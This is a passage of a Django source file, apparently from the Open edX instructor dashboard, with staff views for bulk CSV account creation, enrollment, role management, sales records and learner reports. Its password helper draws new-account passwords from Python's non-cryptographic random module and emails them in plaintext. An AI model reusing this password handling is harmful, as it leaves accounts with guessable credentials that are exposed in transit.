                u"Must be {platform_name} staff to perform this action.".format(
                    platform_name=settings.PLATFORM_NAME
                )
            )
        return func(request, *args, **kwargs)
    return wrapped
def _require_course_role(role_cls):
    """
    Build a view decorator enforcing that the requesting user holds ``role_cls``
    for the course named by the view's ``course_id`` argument.

    The returned decorator wraps a view taking ``(request, course_id)``.
    An unparsable course id yields HttpResponseNotFound (404); a user lacking
    the role yields HttpResponseForbidden (403).

    :param role_cls: a course role class (e.g. CourseSalesAdminRole) constructed
        with a CourseKey.
    """
    def decorator(func):  # pylint: disable=missing-docstring
        def wrapped(request, course_id):  # pylint: disable=missing-docstring
            try:
                course_key = CourseKey.from_string(course_id)
            except InvalidKeyError:
                log.error(u"Unable to find course with course key %s", course_id)
                return HttpResponseNotFound()

            if auth.user_has_role(request.user, role_cls(course_key)):
                return func(request, course_id)
            return HttpResponseForbidden()
        return wrapped
    return decorator


def require_sales_admin(func):
    """
    Decorator for checking sales administrator access before executing an HTTP endpoint. This decorator
    is designed to be used for a request based action on a course. It assumes that there will be a
    request object as well as a course_id attribute to leverage to check course level privileges.

    If the user does not have privileges for this operation, this will return HttpResponseForbidden (403).
    """
    return _require_course_role(CourseSalesAdminRole)(func)


def require_finance_admin(func):
    """
    Decorator for checking finance administrator access before executing an HTTP endpoint. This decorator
    is designed to be used for a request based action on a course. It assumes that there will be a
    request object as well as a course_id attribute to leverage to check course level privileges.

    If the user does not have privileges for this operation, this will return HttpResponseForbidden (403).
    """
    return _require_course_role(CourseFinanceAdminRole)(func)
# Column positions expected in the student-registration CSV upload
# (consumed by register_and_enroll_students below):
# email = 0; username = 1; full name = 2; country = 3.
EMAIL_INDEX = 0
USERNAME_INDEX = 1
NAME_INDEX = 2
COUNTRY_INDEX = 3
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def register_and_enroll_students(request, course_id):  # pylint: disable=too-many-statements
    """
    Create new account and Enroll students in this course.
    Passing a csv file that contains a list of students.
    Order in csv should be the following email = 0; username = 1; name = 2; country = 3.
    Requires staff access.

    -If the email address and username already exists and the user is enrolled in the course,
    do nothing (including no email gets sent out)

    -If the email address already exists, but the username is different,
    match on the email address only and continue to enroll the user in the course using the email address
    as the matching criteria. Note the change of username as a warning message (but not a failure). Send a standard enrollment email
    which is the same as the existing manual enrollment

    -If the username already exists (but not the email), assume it is a different user and fail to create the new account.
    The failure will be messaged in a response in the browser.
    """
    # Feature gate: automated signups must be enabled for the microsite or platform.
    if not microsite.get_value('ALLOW_AUTOMATED_SIGNUPS', settings.FEATURES.get('ALLOW_AUTOMATED_SIGNUPS', False)):
        return HttpResponseForbidden()

    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    warnings = []
    row_errors = []
    general_errors = []

    # for white labels we use 'shopping cart' which uses CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG as
    # course mode for creating course enrollments.
    if CourseMode.is_white_label(course_id):
        course_mode = CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG
    else:
        course_mode = None

    if 'students_list' in request.FILES:
        students = []

        try:
            upload_file = request.FILES.get('students_list')
            if upload_file.name.endswith('.csv'):
                students = [row for row in csv.reader(upload_file.read().splitlines())]
                course = get_course_by_id(course_id)
            else:
                general_errors.append({
                    'username': '', 'email': '',
                    'response': _('Make sure that the file you upload is in CSV format with no extraneous characters or rows.')
                })

        except Exception:  # pylint: disable=broad-except
            general_errors.append({
                'username': '', 'email': '', 'response': _('Could not read uploaded file.')
            })
        finally:
            # Always release the uploaded file handle, even on read failure.
            upload_file.close()

        generated_passwords = []
        row_num = 0
        for student in students:
            row_num = row_num + 1

            # verify that we have exactly four columns in every row but allow for blank lines
            if len(student) != 4:
                if len(student) > 0:
                    general_errors.append({
                        'username': '',
                        'email': '',
                        'response': _('Data in row #{row_num} must have exactly four columns: email, username, full name, and country').format(row_num=row_num)
                    })
                continue

            # Iterate each student in the uploaded csv file.
            email = student[EMAIL_INDEX]
            username = student[USERNAME_INDEX]
            name = student[NAME_INDEX]
            # Profile stores at most a two-character country code; truncate anything longer.
            country = student[COUNTRY_INDEX][:2]

            email_params = get_email_params(course, True, secure=request.is_secure())
            try:
                validate_email(email)  # Raises ValidationError if invalid
            except ValidationError:
                row_errors.append({
                    'username': username, 'email': email, 'response': _('Invalid email {email_address}.').format(email_address=email)})
            else:
                if User.objects.filter(email=email).exists():
                    # Email address already exists. assume it is the correct user
                    # and just register the user in the course and send an enrollment email.
                    user = User.objects.get(email=email)

                    # see if it is an exact match with email and username
                    # if it's not an exact match then just display a warning message, but continue onwards
                    if not User.objects.filter(email=email, username=username).exists():
                        warning_message = _(
                            'An account with email {email} exists but the provided username {username} '
                            'is different. Enrolling anyway with {email}.'
                        ).format(email=email, username=username)

                        warnings.append({
                            'username': username, 'email': email, 'response': warning_message
                        })
                        log.warning(u'email %s already exist', email)
                    else:
                        log.info(
                            u"user already exists with username '%s' and email '%s'",
                            username,
                            email
                        )

                    # enroll a user if it is not already enrolled.
                    if not CourseEnrollment.is_enrolled(user, course_id):
                        # Enroll user to the course and add manual enrollment audit trail
                        create_manual_course_enrollment(
                            user=user,
                            course_id=course_id,
                            mode=course_mode,
                            enrolled_by=request.user,
                            reason='Enrolling via csv upload',
                            state_transition=UNENROLLED_TO_ENROLLED,
                        )
                        enroll_email(course_id=course_id, student_email=email, auto_enroll=True, email_students=True, email_params=email_params)
                else:
                    # This email does not yet exist, so we need to create a new account
                    # If username already exists in the database, then create_and_enroll_user
                    # will raise an IntegrityError exception.
                    password = generate_unique_password(generated_passwords)

                    errors = create_and_enroll_user(
                        email, username, name, country, password, course_id, course_mode, request.user, email_params
                    )
                    row_errors.extend(errors)

    else:
        general_errors.append({
            'username': '', 'email': '', 'response': _('File is not attached.')
        })

    results = {
        'row_errors': row_errors,
        'general_errors': general_errors,
        'warnings': warnings
    }
    return JsonResponse(results)
def generate_random_string(length):
    """
    Create a string of random characters of specified length.

    Characters are drawn from ASCII letters and digits, excluding visually
    ambiguous ones (vowels in both cases, '1' and 'l') so generated passwords
    are unambiguous when read aloud or transcribed.

    :param length: number of characters to generate.
    :return: random string of `length` characters.
    """
    chars = [
        char for char in string.ascii_uppercase + string.digits + string.ascii_lowercase
        if char not in 'aAeEiIoOuU1l'
    ]
    # str.join instead of the long-deprecated (and Python 3-removed) string.join.
    return ''.join(random.choice(chars) for __ in range(length))
def generate_unique_password(generated_passwords, password_length=12):
    """
    generate a unique password for each student.

    Keeps drawing random strings until one not already present in
    `generated_passwords` is found, records it there, and returns it.
    """
    while True:
        candidate = generate_random_string(password_length)
        if candidate not in generated_passwords:
            break

    generated_passwords.append(candidate)
    return candidate
def create_user_and_user_profile(email, username, name, country, password):
    """
    Create a new user, add a new Registration instance for letting user verify its identity and create a user profile.

    :param email: user's email address
    :param username: user's username
    :param name: user's name
    :param country: user's country
    :param password: user's password
    :return: User instance of the new user.
    """
    new_user = User.objects.create_user(username, email, password)

    # Attach a Registration record so the account can go through identity verification.
    registration = Registration()
    registration.register(new_user)

    # The profile carries descriptive fields the User model itself does not hold.
    new_profile = UserProfile(user=new_user)
    new_profile.name = name
    new_profile.country = country
    new_profile.save()

    return new_user
def create_manual_course_enrollment(user, course_id, mode, enrolled_by, reason, state_transition):
    """
    Create course enrollment for the given student and create manual enrollment audit trail.

    :param user: User who is to enroll in course
    :param course_id: course identifier of the course in which to enroll the user.
    :param mode: mode for user enrollment, e.g. 'honor', 'audit' etc.
    :param enrolled_by: User who made the manual enrollment entry (usually instructor or support)
    :param reason: Reason behind manual enrollment
    :param state_transition: state transition denoting whether student enrolled from un-enrolled,
            un-enrolled from enrolled etc.
    :return CourseEnrollment instance.
    """
    new_enrollment = CourseEnrollment.enroll(user, course_id, mode=mode)

    # Record who enrolled this user, and why, for later auditing.
    ManualEnrollmentAudit.create_manual_enrollment_audit(
        enrolled_by, user.email, state_transition, reason, new_enrollment
    )

    log.info(u'user %s enrolled in the course %s', user.username, course_id)
    return new_enrollment
def create_and_enroll_user(email, username, name, country, password, course_id, course_mode, enrolled_by, email_params):
    """
    Create a new user and enroll him/her to the given course, return list of errors in the following format
        Error format:
            each error is key-value pait dict with following key-value pairs.
            1. username: username of the user to enroll
            1. email: email of the user to enroll
            1. response: readable error message

    :param email: user's email address
    :param username: user's username
    :param name: user's name
    :param country: user's country
    :param password: user's password
    :param course_id: course identifier of the course in which to enroll the user.
    :param course_mode: mode for user enrollment, e.g. 'honor', 'audit' etc.
    :param enrolled_by: User who made the manual enrollment entry (usually instructor or support)
    :param email_params: information to send to the user via email
    :return: list of errors
    """
    errors = list()
    try:
        # User creation and enrollment are atomic: either both succeed or both roll back.
        with transaction.atomic():
            # Create a new user
            user = create_user_and_user_profile(email, username, name, country, password)

            # Enroll user to the course and add manual enrollment audit trail
            create_manual_course_enrollment(
                user=user,
                course_id=course_id,
                mode=course_mode,
                enrolled_by=enrolled_by,
                reason='Enrolling via csv upload',
                state_transition=UNENROLLED_TO_ENROLLED,
            )
    except IntegrityError:
        # Username collision: the atomic block above has rolled everything back.
        errors.append({
            'username': username, 'email': email, 'response': _('Username {user} already exists.').format(user=username)
        })
    except Exception as ex:  # pylint: disable=broad-except
        log.exception(type(ex).__name__)
        errors.append({
            'username': username, 'email': email, 'response': type(ex).__name__,
        })
    else:
        try:
            # It's a new user, an email will be sent to each newly created user.
            email_params.update({
                'message': 'account_creation_and_enrollment',
                'email_address': email,
                'password': password,
                'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
            })
            send_mail_to_student(email, email_params)
        except Exception as ex:  # pylint: disable=broad-except
            # Email failure does NOT undo the enrollment; it is reported as a row error
            # because the user would otherwise have no way to learn their password.
            log.exception(
                "Exception '{exception}' raised while sending email to new user.".format(exception=type(ex).__name__)
            )
            errors.append({
                'username': username,
                'email': email,
                'response':
                    _("Error '{error}' while sending email to new user (user email={email}). "
                      "Without the email student would not be able to login. "
                      "Please contact support for further information.").format(error=type(ex).__name__, email=email),
            })
        else:
            log.info(u'email sent to new created user at %s', email)

    return errors
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(action="enroll or unenroll", identifiers="stringified list of emails and/or usernames")
def students_update_enrollment(request, course_id):
    """
    Enroll or unenroll students by email.
    Requires staff access.

    Query Parameters:
    - action in ['enroll', 'unenroll']
    - identifiers is string containing a list of emails and/or usernames separated by anything split_input_list can handle.
    - auto_enroll is a boolean (defaults to false)
        If auto_enroll is false, students will be allowed to enroll.
        If auto_enroll is true, students will be enrolled as soon as they register.
    - email_students is a boolean (defaults to false)
        If email_students is true, students will be sent email notification
        If email_students is false, students will not be sent email notification

    Returns an analog to this JSON structure: {
        "action": "enroll",
        "auto_enroll": false,
        "results": [
            {
                "email": "testemail@test.org",
                "before": {
                    "enrollment": false,
                    "auto_enroll": false,
                    "user": true,
                    "allowed": false
                },
                "after": {
                    "enrollment": true,
                    "auto_enroll": false,
                    "user": true,
                    "allowed": false
                }
            }
        ]
    }
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    action = request.POST.get('action')
    identifiers_raw = request.POST.get('identifiers')
    identifiers = _split_input_list(identifiers_raw)
    # Checkbox-style booleans arrive from the client as strings.
    auto_enroll = request.POST.get('auto_enroll') in ['true', 'True', True]
    email_students = request.POST.get('email_students') in ['true', 'True', True]

    is_white_label = CourseMode.is_white_label(course_id)
    reason = request.POST.get('reason')
    # White-label courses require an explicit reason for any manual enrollment change.
    if is_white_label:
        if not reason:
            return JsonResponse(
                {
                    'action': action,
                    'results': [{'error': True}],
                    'auto_enroll': auto_enroll,
                }, status=400)

    enrollment_obj = None
    state_transition = DEFAULT_TRANSITION_STATE

    email_params = {}
    if email_students:
        course = get_course_by_id(course_id)
        email_params = get_email_params(course, auto_enroll, secure=request.is_secure())

    results = []
    for identifier in identifiers:
        # First try to get a user object from the identifer
        user = None
        email = None
        language = None
        try:
            user = get_student_from_identifier(identifier)
        except User.DoesNotExist:
            # No existing account: assume the identifier is an email address.
            email = identifier
        else:
            email = user.email
            language = get_user_email_language(user)

        try:
            # Use django.core.validators.validate_email to check email address
            # validity (obviously, cannot check if email actually /exists/,
            # simply that it is plausibly valid)
            validate_email(email)  # Raises ValidationError if invalid

            if action == 'enroll':
                before, after, enrollment_obj = enroll_email(
                    course_id, email, auto_enroll, email_students, email_params, language=language
                )
                before_enrollment = before.to_dict()['enrollment']
                before_user_registered = before.to_dict()['user']
                before_allowed = before.to_dict()['allowed']
                after_enrollment = after.to_dict()['enrollment']
                after_allowed = after.to_dict()['allowed']

                # Derive which manual-enrollment state transition happened,
                # for the ManualEnrollmentAudit record written below.
                if before_user_registered:
                    if after_enrollment:
                        if before_enrollment:
                            state_transition = ENROLLED_TO_ENROLLED
                        else:
                            if before_allowed:
                                state_transition = ALLOWEDTOENROLL_TO_ENROLLED
                            else:
                                state_transition = UNENROLLED_TO_ENROLLED
                else:
                    if after_allowed:
                        state_transition = UNENROLLED_TO_ALLOWEDTOENROLL

            elif action == 'unenroll':
                before, after = unenroll_email(
                    course_id, email, email_students, email_params, language=language
                )
                before_enrollment = before.to_dict()['enrollment']
                before_allowed = before.to_dict()['allowed']
                # user may be None here (identifier was a bare email);
                # get_enrollment then returns None for the audit record.
                enrollment_obj = CourseEnrollment.get_enrollment(user, course_id)

                if before_enrollment:
                    state_transition = ENROLLED_TO_UNENROLLED
                else:
                    if before_allowed:
                        state_transition = ALLOWEDTOENROLL_TO_UNENROLLED
                    else:
                        state_transition = UNENROLLED_TO_UNENROLLED

            else:
                return HttpResponseBadRequest(strip_tags(
                    "Unrecognized action '{}'".format(action)
                ))

        except ValidationError:
            # Flag this email as an error if invalid, but continue checking
            # the remaining in the list
            results.append({
                'identifier': identifier,
                'invalidIdentifier': True,
            })

        except Exception as exc:  # pylint: disable=broad-except
            # catch and log any exceptions
            # so that one error doesn't cause a 500.
            log.exception(u"Error while #{}ing student")
            log.exception(exc)
            results.append({
                'identifier': identifier,
                'error': True,
            })

        else:
            # Success path: record the manual enrollment change for auditing.
            ManualEnrollmentAudit.create_manual_enrollment_audit(
                request.user, email, state_transition, reason, enrollment_obj
            )
            results.append({
                'identifier': identifier,
                'before': before.to_dict(),
                'after': after.to_dict(),
            })

    response_payload = {
        'action': action,
        'results': results,
        'auto_enroll': auto_enroll,
    }
    return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
@require_post_params(
    identifiers="stringified list of emails and/or usernames",
    action="add or remove",
)
def bulk_beta_modify_access(request, course_id):
    """
    Enroll or unenroll users in beta testing program.

    Query parameters:
    - identifiers is string containing a list of emails and/or usernames separated by
      anything split_input_list can handle.
    - action is one of ['add', 'remove']
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    action = request.POST.get('action')
    identifiers_raw = request.POST.get('identifiers')
    identifiers = _split_input_list(identifiers_raw)
    # Checkbox-style booleans arrive from the client as strings.
    email_students = request.POST.get('email_students') in ['true', 'True', True]
    auto_enroll = request.POST.get('auto_enroll') in ['true', 'True', True]
    results = []
    rolename = 'beta'
    course = get_course_by_id(course_id)

    email_params = {}
    if email_students:
        secure = request.is_secure()
        email_params = get_email_params(course, auto_enroll=auto_enroll, secure=secure)

    for identifier in identifiers:
        try:
            error = False
            user_does_not_exist = False
            user = get_student_from_identifier(identifier)

            if action == 'add':
                allow_access(course, user, rolename)
            elif action == 'remove':
                revoke_access(course, user, rolename)
            else:
                return HttpResponseBadRequest(strip_tags(
                    "Unrecognized action '{}'".format(action)
                ))
        except User.DoesNotExist:
            error = True
            user_does_not_exist = True
        # catch and log any unexpected exceptions
        # so that one error doesn't cause a 500.
        except Exception as exc:  # pylint: disable=broad-except
            log.exception(u"Error while #{}ing student")
            log.exception(exc)
            error = True
        else:
            # If no exception thrown, see if we should send an email
            if email_students:
                send_beta_role_email(action, user, email_params)
            # See if we should autoenroll the student
            if auto_enroll:
                # Check if student is already enrolled
                if not CourseEnrollment.is_enrolled(user, course_id):
                    CourseEnrollment.enroll(user, course_id)
        finally:
            # Tabulate the action result of this email address
            # (runs even on the bad-action early return above).
            results.append({
                'identifier': identifier,
                'error': error,
                'userDoesNotExist': user_does_not_exist
            })

    response_payload = {
        'action': action,
        'results': results,
    }
    return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
@require_post_params(
    unique_student_identifier="email or username of user to change access",
    rolename="'instructor', 'staff', 'beta', or 'ccx_coach'",
    action="'allow' or 'revoke'"
)
def modify_access(request, course_id):
    """
    Modify staff/instructor access of other user.
    Requires instructor access.

    NOTE: instructors cannot remove their own instructor access.

    Query parameters:
    unique_student_identifer is the target user's username or email
    rolename is one of ['instructor', 'staff', 'beta', 'ccx_coach']
    action is one of ['allow', 'revoke']
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'instructor', course_id, depth=None
    )
    try:
        user = get_student_from_identifier(request.POST.get('unique_student_identifier'))
    except User.DoesNotExist:
        response_payload = {
            'unique_student_identifier': request.POST.get('unique_student_identifier'),
            'userDoesNotExist': True,
        }
        return JsonResponse(response_payload)

    # Check that user is active, because add_users
    # in common/djangoapps/student/roles.py fails
    # silently when we try to add an inactive user.
    if not user.is_active:
        response_payload = {
            'unique_student_identifier': user.username,
            'inactiveUser': True,
        }
        return JsonResponse(response_payload)

    rolename = request.POST.get('rolename')
    action = request.POST.get('action')

    if rolename not in ROLES:
        error = strip_tags("unknown rolename '{}'".format(rolename))
        log.error(error)
        return HttpResponseBadRequest(error)

    # disallow instructors from removing their own instructor access.
    if rolename == 'instructor' and user == request.user and action != 'allow':
        response_payload = {
            'unique_student_identifier': user.username,
            'rolename': rolename,
            'action': action,
            'removingSelfAsInstructor': True,
        }
        return JsonResponse(response_payload)

    if action == 'allow':
        allow_access(course, user, rolename)
    elif action == 'revoke':
        revoke_access(course, user, rolename)
    else:
        return HttpResponseBadRequest(strip_tags(
            "unrecognized action '{}'".format(action)
        ))

    response_payload = {
        'unique_student_identifier': user.username,
        'rolename': rolename,
        'action': action,
        'success': 'yes',
    }
    return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@require_post_params(rolename="'instructor', 'staff', or 'beta'")
def list_course_role_members(request, course_id):
    """
    List the members of a course role (instructors, staff, ...).
    Requires instructor access.

    rolename is one of ['instructor', 'staff', 'beta', 'ccx_coach']

    Returns JSON of the form {
        "course_id": "some/course/id",
        "staff": [
            {
                "username": "staff1",
                "email": "staff1@example.org",
                "first_name": "Joe",
                "last_name": "Shmoe",
            }
        ]
    }
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'instructor', course_key, depth=None
    )

    rolename = request.POST.get('rolename')
    if rolename not in ROLES:
        return HttpResponseBadRequest()

    def serialize_user(member):
        """ Flatten a user into the JSON-friendly dict shown above. """
        return {
            'username': member.username,
            'email': member.email,
            'first_name': member.first_name,
            'last_name': member.last_name,
        }

    return JsonResponse({
        'course_id': course_key.to_deprecated_string(),
        rolename: [serialize_user(member) for member in list_with_level(course, rolename)],
    })
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_problem_responses(request, course_id):
    """
    Initiate generation of a CSV file containing all student answers
    to a given problem.

    Responds with JSON
        {"status": "... status message ..."}
    if initiation is successful (or generation task is already running).

    Responds with BadRequest if problem location is faulty.
    """
    course_key = CourseKey.from_string(course_id)
    problem_location = request.POST.get('problem_location', '')

    try:
        problem_key = UsageKey.from_string(problem_location)
        # Are we dealing with an "old-style" problem location?
        run = problem_key.run
        if not run:
            # Old-style location: re-parse it relative to this course's key.
            problem_key = course_key.make_usage_key_from_deprecated_string(problem_location)
        if problem_key.course_key != course_key:
            # Problem belongs to a different course; treat it as not found.
            raise InvalidKeyError(type(problem_key), problem_key)
    except InvalidKeyError:
        return JsonResponseBadRequest(_("Could not find problem with this location."))

    try:
        instructor_task.api.submit_calculate_problem_responses_csv(request, course_key, problem_location)
        success_status = _(
            "The problem responses report is being created."
            " To view the status of the report, see Pending Tasks below."
        )
        return JsonResponse({"status": success_status})
    except AlreadyRunningError:
        # A report task for this problem is already queued or running.
        already_running_status = _(
            "A problem responses report generation task is already in progress. "
            "Check the 'Pending Tasks' table for the status of the task. "
            "When completed, the report will be available for download in the table below."
        )
        return JsonResponse({"status": already_running_status})
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_grading_config(request, course_id):
    """
    Respond with json which contains a html formatted grade summary.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'staff', course_key, depth=None
    )
    return JsonResponse({
        'course_id': course_key.to_deprecated_string(),
        'grading_config_summary': instructor_analytics.basic.dump_grading_context(course),
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_sale_records(request, course_id, csv=False):  # pylint: disable=unused-argument, redefined-outer-name
    """
    Return a summary of all sale records for a particular course.

    Responds with CSV when ``csv`` is truthy, otherwise with JSON.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    query_features = [
        'company_name', 'company_contact_name', 'company_contact_email', 'total_codes', 'total_used_codes',
        'total_amount', 'created', 'customer_reference_number', 'recipient_name', 'recipient_email', 'created_by',
        'internal_reference', 'invoice_number', 'codes', 'course_id'
    ]
    sale_data = instructor_analytics.basic.sale_record_features(course_key, query_features)

    if csv:
        header, datarows = instructor_analytics.csvs.format_dictlist(sale_data, query_features)
        return instructor_analytics.csvs.create_csv_response("e-commerce_sale_invoice_records.csv", header, datarows)

    # JSON branch: replace the User object with just its username so the
    # payload is serializable.
    for record in sale_data:
        record['created_by'] = record['created_by'].username
    return JsonResponse({
        'course_id': course_key.to_deprecated_string(),
        'sale': sale_data,
        'queried_features': query_features
    })
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_sale_order_records(request, course_id):  # pylint: disable=unused-argument
    """
    Return a CSV summarising all sale-order records for a particular course.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    # (database column, CSV header) pairs, in output order.
    column_specs = [
        ('id', 'Order Id'),
        ('company_name', 'Company Name'),
        ('company_contact_name', 'Company Contact Name'),
        ('company_contact_email', 'Company Contact Email'),
        ('logged_in_username', 'Login Username'),
        ('logged_in_email', 'Login User Email'),
        ('purchase_time', 'Date of Sale'),
        ('customer_reference_number', 'Customer Reference Number'),
        ('recipient_name', 'Recipient Name'),
        ('recipient_email', 'Recipient Email'),
        ('bill_to_street1', 'Street 1'),
        ('bill_to_street2', 'Street 2'),
        ('bill_to_city', 'City'),
        ('bill_to_state', 'State'),
        ('bill_to_postalcode', 'Postal Code'),
        ('bill_to_country', 'Country'),
        ('order_type', 'Order Type'),
        ('status', 'Order Item Status'),
        ('coupon_code', 'Coupon Code'),
        ('list_price', 'List Price'),
        ('unit_cost', 'Unit Price'),
        ('quantity', 'Quantity'),
        ('total_discount', 'Total Discount'),
        ('total_amount', 'Total Amount Paid'),
    ]
    db_columns = [db_col for db_col, __ in column_specs]
    csv_columns = [header for __, header in column_specs]
    order_data = instructor_analytics.basic.sale_order_record_features(course_key, db_columns)
    __, datarows = instructor_analytics.csvs.format_dictlist(order_data, db_columns)
    return instructor_analytics.csvs.create_csv_response("e-commerce_sale_order_records.csv", csv_columns, datarows)
@require_level('staff')
@require_POST
def sale_validation(request, course_id):
    """
    Invalidate or re-validate the sale attached to an invoice number,
    depending on the requested event type.
    """
    if 'invoice_number' not in request.POST:
        return HttpResponseBadRequest("Missing required invoice_number parameter")
    invoice_number = request.POST['invoice_number']

    try:
        invoice_number = int(invoice_number)
    except ValueError:
        return HttpResponseBadRequest(
            "invoice_number must be an integer, {value} provided".format(
                value=invoice_number
            )
        )

    if 'event_type' not in request.POST:
        return HttpResponseBadRequest("Missing required event_type parameter")
    event_type = request.POST['event_type']

    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        invoice_item = CourseRegistrationCodeInvoiceItem.objects.select_related('invoice').get(
            invoice_id=invoice_number,
            course_id=course_key
        )
    except CourseRegistrationCodeInvoiceItem.DoesNotExist:  # Check for old type invoices
        return HttpResponseNotFound(_("Invoice number '{num}' does not exist.").format(num=invoice_number))

    obj_invoice = invoice_item.invoice
    if event_type == "invalidate":
        return invalidate_invoice(obj_invoice)
    return re_validate_invoice(obj_invoice)
def invalidate_invoice(obj_invoice):
    """
    Mark the sale attached to ``obj_invoice`` as invalid and persist it.
    """
    if not obj_invoice.is_valid:
        # Nothing to do; refuse the double-invalidation.
        return HttpResponseBadRequest(_("The sale associated with this invoice has already been invalidated."))
    obj_invoice.is_valid = False
    obj_invoice.save()
    return JsonResponse({
        'message': _('Invoice number {0} has been invalidated.').format(obj_invoice.id)
    })
def re_validate_invoice(obj_invoice):
    """
    Mark the sale attached to ``obj_invoice`` as valid again and persist it.
    """
    if obj_invoice.is_valid:
        # Already active; refuse the redundant re-validation.
        return HttpResponseBadRequest(_("This invoice is already active."))
    obj_invoice.is_valid = True
    obj_invoice.save()
    return JsonResponse({
        'message': _('The registration codes for invoice {0} have been re-activated.').format(obj_invoice.id)
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_issued_certificates(request, course_id):
    """
    Report the certificates issued for a course.

    Responds with a CSV download when the 'csv' GET parameter is 'true',
    otherwise with JSON of the form
    {"certificates": [{course_id: xyz, mode: 'honor'}, ...]}

    Arguments:
        course_id
    """
    course_key = CourseKey.from_string(course_id)
    want_csv = request.GET.get('csv', 'false').lower() == 'true'
    query_features = ['course_id', 'mode', 'total_issued_certificate', 'report_run_date']
    # (feature key, translated display name) pairs, in output order.
    query_features_names = [
        ('course_id', _('CourseID')),
        ('mode', _('Certificate Type')),
        ('total_issued_certificate', _('Total Certificates Issued')),
        ('report_run_date', _('Date Report Run'))
    ]
    certificates_data = instructor_analytics.basic.issued_certificates(course_key, query_features)

    if not want_csv:
        return JsonResponse({
            'certificates': certificates_data,
            'queried_features': query_features,
            'feature_names': dict(query_features_names)
        })

    __, data_rows = instructor_analytics.csvs.format_dictlist(certificates_data, query_features)
    return instructor_analytics.csvs.create_csv_response(
        'issued_certificates.csv',
        [col_header for __, col_header in query_features_names],
        data_rows
    )
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_students_features(request, course_id, csv=False):  # pylint: disable=redefined-outer-name
    """
    Respond with json which contains a summary of all enrolled students profile information.

    Responds with JSON
        {"students": [{-student-info-}, ...]}

    When ``csv`` is truthy, instead spawns an asynchronous task that builds
    the report as a downloadable CSV and responds with the task status.

    TO DO accept requests for different attribute sets.
    """
    course_key = CourseKey.from_string(course_id)
    course = get_course_by_id(course_key)

    available_features = instructor_analytics.basic.AVAILABLE_FEATURES

    # Allow for microsites to be able to define additional columns.
    # Note that adding additional columns has the potential to break
    # the student profile report due to a character limit on the
    # asynchronous job input which in this case is a JSON string
    # containing the list of columns to include in the report.
    # TODO: Refactor the student profile report code to remove the list of columns
    # that should be included in the report from the asynchronous job input.
    # We need to clone the list because we modify it below
    query_features = list(microsite.get_value('student_profile_download_fields', []))

    if not query_features:
        # Default column set when the microsite defines none.
        query_features = [
            'id', 'username', 'name', 'email', 'language', 'location',
            'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
            'goals',
        ]

    # Provide human-friendly and translatable names for these features. These names
    # will be displayed in the table generated in data_download.coffee. It is not (yet)
    # used as the header row in the CSV, but could be in the future.
    query_features_names = {
        'id': _('User ID'),
        'username': _('Username'),
        'name': _('Name'),
        'email': _('Email'),
        'language': _('Language'),
        'location': _('Location'),
        'year_of_birth': _('Birth Year'),
        'gender': _('Gender'),
        'level_of_education': _('Level of Education'),
        'mailing_address': _('Mailing Address'),
        'goals': _('Goals'),
    }

    if is_course_cohorted(course.id):
        # Translators: 'Cohort' refers to a group of students within a course.
        query_features.append('cohort')
        query_features_names['cohort'] = _('Cohort')

    if course.teams_enabled:
        query_features.append('team')
        query_features_names['team'] = _('Team')

    # For compatibility reasons, city and country should always appear last.
    query_features.append('city')
    query_features_names['city'] = _('City')
    query_features.append('country')
    query_features_names['country'] = _('Country')

    if not csv:
        # Synchronous path: return the profile data inline as JSON.
        student_data = instructor_analytics.basic.enrolled_students_features(course_key, query_features)
        response_payload = {
            'course_id': unicode(course_key),
            'students': student_data,
            'students_count': len(student_data),
            'queried_features': query_features,
            'feature_names': query_features_names,
            'available_features': available_features,
        }
        return JsonResponse(response_payload)
    else:
        # Asynchronous path: spawn a background task that builds the CSV.
        try:
            instructor_task.api.submit_calculate_students_features_csv(request, course_key, query_features)
            success_status = _("The enrolled learner profile report is being created."
                               " To view the status of the report, see Pending Tasks below.")
            return JsonResponse({"status": success_status})
        except AlreadyRunningError:
            already_running_status = _(
                "This enrollment report is currently being created."
                " To view the status of the report, see Pending Tasks below."
                " You will be able to download the report when it is complete.")
            return JsonResponse({"status": already_running_status})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
